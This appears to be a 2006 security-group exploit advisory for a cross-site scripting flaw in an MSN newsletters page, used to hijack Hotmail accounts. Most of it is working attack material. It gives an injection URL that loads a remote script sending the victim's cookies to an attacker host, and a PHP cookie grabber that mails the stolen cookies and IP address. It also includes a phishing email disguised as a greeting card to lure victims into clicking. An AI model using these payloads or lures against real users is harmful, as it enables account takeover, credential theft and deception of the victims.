hotmailmsnxss.txt

`Hotmail/MSN Cross Site Scripting Exploit  
  
Author: Simo64  
Contact: simo64_at_morx_dot_org  
Discovered: 07/25/2006  
Published: 08/10/2006  
Vendor: MSN.com  
Service: Hotmail.com Webmail Service  
Vulnerability: Cross Site Scripting (Cookie-Theft)  
Severity: Medium/High  
Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all  
browsers)  
  
Morx Security Research Team  
http://www.morx.org  
  
Description:  
  
Exploit written in PHP to exploit the 'RE' variable in  
newsletters.msn.com/xs-v3/insite.asp  
cross site scripting vulnerability inside MSN.com website. Exploit  
requires the victim to  
open the email sent by the attacker and click on a URL, therefore some  
Social Engineering  
skills are required too  
  
  
Exploitation:  
  
  
Exploiting this vulnerability can be done by uploading the following  
script to a php enabled  
webserver then send an email to the victim with  
http://http://www.attacker-server.com/ecard.php  
the link of the script that redirect to vulnerable msn site , so as an  
example the email can be  
sent as a greeting card with the following  
HTML code, you may also need to modify some things on the ecard.php  
exploit to make it fit your needs.  
  
Hello, </p>  
Alias has just sent you a greeting card. </p>  
To view your greeting card, click on the link below: </p>  
<a href="http://attacker-site/ecard.php"> http://  
lycos.americangreetings.com/view.pd?i=197484541&m=8381&rr=y&source=lycos  
</a> </p>  
Or copy and paste the above link into your web browser's address window</p>  
Or enter this eCard number 9584B7E784 on our eCard Pick Up page at  
www.americangreetings.com</p>  
Thanks for using Lycos Greetings with AmericanGreetings.com  
  
  
  
  
------------------------ Hotmail/MSN accounts XSS Xploit by Simo64  
---------------------- */  
  
Exploit :  
  
http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script  
src=http://attacker/redir.js>  
  
WHERE redir.js code is :  
  
location.href='http://attacker-site/a.php?cookie='+escape(document.cookie)  
  
and a.php as cookie grabber may use the following code:  
  
<?  
$cookie = $_GET['cookie'];  
$ip = getenv("REMOTE_ADDR");  
$msg = "Cookie: $cookie\nIP Address: $ip";  
$subject = "cookie";  
mail("[email protected]", $subject, $msg);  
  
header ("location:  
http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");  
?>  
  
  
ecrad.php page may contain a simple php or javascript rediretion to  
exploit link :)  
  
  
Disclaimer:  
  
this entire document is for eductional, testing and demonstrating purpose  
only. Modification use and/or publishing  
this information is entirely on your OWN risk. The information provided in  
this advisory is to be used/tested on your  
OWN machine/Account. I cannot be held responsible for any of the above.`